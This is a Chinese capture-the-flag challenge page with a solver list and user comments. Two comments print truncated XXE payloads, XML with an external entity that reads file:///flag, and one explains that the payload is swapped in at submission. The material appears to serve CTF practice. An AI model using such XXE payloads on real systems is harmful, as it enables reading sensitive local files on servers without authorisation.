评分(0)
暂无评分
解题动态

biandanjun 攻破了该题 1月前

tianna 攻破了该题 1月前

coldplay99999 攻破了该题 1月前

wh1826 攻破了该题 2月前

WCRH 攻破了该题 3月前

POEighT 攻破了该题 4月前

wangjf 攻破了该题 5月前

t1tl3d 攻破了该题 6月前

fuhuameng 攻破了该题 7月前

cxy18 攻破了该题 7月前

Ramrem 攻破了该题 9月前

平凡的人 攻破了该题 10月前

小何lv 攻破了该题 10月前

cc 攻破了该题 10月前

MRLD 攻破了该题 11月前

18092952956 攻破了该题 11月前

宫崎骏 攻破了该题 11月前

宫园薰 攻破了该题 11月前

gooddemo 攻破了该题 11月前

评论
MRLD 11月前
举报
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE user [ <!ELEMENT name ANY > <!ENTITY admin SYSTEM "file:///flag" >]> <user><userna
MRLD 11月前
举报
真得出生出题人,假flag是真的,闲的这样搞
gooddemo 11月前
举报
这个是xxe漏洞,所以在点击提交按钮时,修改Payload,内容如下:<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///flag">]> <user><use
hopeinhand 1年前
举报
找半天结果假flag是真的,很迷惑